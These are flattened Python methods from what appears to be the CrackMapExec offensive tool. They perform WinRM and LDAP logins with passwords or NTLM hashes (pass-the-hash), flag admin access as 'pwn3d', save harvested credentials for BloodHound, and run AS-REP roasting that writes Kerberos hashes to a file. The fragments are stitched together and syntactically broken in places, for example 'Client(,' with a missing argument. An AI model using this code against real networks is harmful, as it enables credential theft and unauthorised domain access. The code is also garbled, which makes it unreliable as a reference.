def plaintext_login(self, domain, username, password): try: from urllib3.connectionpool import log log.addFilter(SuppressFilter()) self.conn = Client(, auth='ntlm', username=u'{}\\{}'.format(domain, username), password=password, ssl=False) # TO DO: right now we're just running the hostname command to make the winrm library auth to the server # we could just authenticate without running a command :) (probably) self.conn.execute_ps("hostname") self.admin_privs = True self.logger.success(u'{}\\{}:{} {}'.format( self.domain, username, password, highlight('({})'.format(self.config.get('CME', 'pwn3d_label') ) if self.admin_privs else ''))) add_user_bh(self.username, self.domain, self.logger, self.config) if not self.args.continue_on_success: return True except Exception as e: if "with ntlm" in str(e): self.logger.error(u'{}\\{}:{}'.format(self.domain, username, password)) else: self.logger.error(u'{}\\{}:{} "{}"'.format( self.domain, username, password, e)) return False
def hash_login(self, domain, username, ntlm_hash): try: from urllib3.connectionpool import log log.addFilter(SuppressFilter()) lmhash = '00000000000000000000000000000000:' nthash = '' #This checks to see if we didn't provide the LM Hash if ntlm_hash.find(':') != -1: lmhash, nthash = ntlm_hash.split(':') else: nthash = ntlm_hash ntlm_hash = lmhash + nthash self.hash = nthash if lmhash: self.lmhash = lmhash if nthash: self.nthash = nthash self.conn = Client(, auth='ntlm', username=u'{}\\{}'.format(domain, username), password=ntlm_hash, ssl=False) # TO DO: right now we're just running the hostname command to make the winrm library auth to the server # we could just authenticate without running a command :) (probably) self.conn.execute_ps("hostname") self.admin_privs = True self.logger.success(u'{}\\{}:{} {}'.format( self.domain, username, self.hash, highlight('({})'.format(self.config.get('CME', 'pwn3d_label') ) if self.admin_privs else ''))) add_user_bh(self.username, self.domain, self.logger, self.config) if not self.args.continue_on_success: return True except Exception as e: if "with ntlm" in str(e): self.logger.error(u'{}\\{}:{}'.format(self.domain, username, self.hash)) else: self.logger.error(u'{}\\{}:{} "{}"'.format( self.domain, username, self.hash, e)) return False
def process_credentials(self, context, connection, credentials): if len(credentials) == 0:"No credentials found") credz_bh = [] for cred in credentials: domain = cred["domain"] if "." not in cred["domain"] and cred["domain"].upper( ) in connection.domain.upper(): domain = connection.domain # slim shady self.save_credentials(context, connection, cred["domain"], cred["username"], cred["password"], cred["lmhash"], cred["nthash"]) self.print_credentials(context, cred["domain"], cred["username"], cred["password"], cred["lmhash"], cred["nthash"]) credz_bh.append({ 'username': cred["username"].upper(), 'domain': domain.upper() }) add_user_bh(credz_bh, domain, context.log, connection.config)
def hash_login(self, domain, username, ntlm_hash): lmhash = '' nthash = '' #This checks to see if we didn't provide the LM Hash if ntlm_hash.find(':') != -1: lmhash, nthash = ntlm_hash.split(':') else: nthash = ntlm_hash self.hash = ntlm_hash if lmhash: self.lmhash = lmhash if nthash: self.nthash = nthash self.username = username self.domain = domain if self.kdcHost is not None: target = self.kdcHost else: target = domain self.kdcHost = domain # Create the baseDN self.baseDN = '' domainParts = self.kdcHost.split('.') for i in domainParts: self.baseDN += 'dc=%s,' % i # Remove last ',' self.baseDN = self.baseDN[:-1] if self.hash == '' and self.args.asreproast: hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username) if hash_TGT: self.logger.highlight(u'{}'.format(hash_TGT)) with open(self.args.asreproast, 'a+') as hash_asreproast: hash_asreproast.write(hash_TGT + '\n') return False # Connect to LDAP try: self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost) self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash) self.check_if_admin() out = u'{}{}:{} {}'.format('{}\\'.format(domain), username, nthash, highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')) self.logger.extra['protocol'] = "LDAP" self.logger.extra['port'] = "389" self.logger.success(out) add_user_bh(self.username, self.domain, self.logger, self.config) if not self.args.continue_on_success: return True except ldap_impacket.LDAPSessionError as e: if str(e).find('strongerAuthRequired') >= 0: try: # We need to try SSL self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost) self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash) self.logger.extra['protocol'] = "LDAPS" self.logger.extra['port'] = "636" self.logger.success(out) except ldap_impacket.LDAPSessionError as e: errorCode = str(e).split()[-2][:-1] self.logger.error(u'{}\\{}:{} {}'.format(self.domain, self.username, self.password, ldap_error_status[errorCode] if errorCode in ldap_error_status else ''), color='magenta' if errorCode in ldap_error_status else 'red') else: errorCode = str(e).split()[-2][:-1] self.logger.error(u'{}\\{}:{} {}'.format(self.domain, self.username, self.password, ldap_error_status[errorCode] if errorCode in ldap_error_status else ''), color='magenta' if errorCode in ldap_error_status else 'red') return False except OSError as e: self.logger.error(u'{}\\{}:{} {}'.format(self.domain, self.username, self.nthash, "Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller")) return False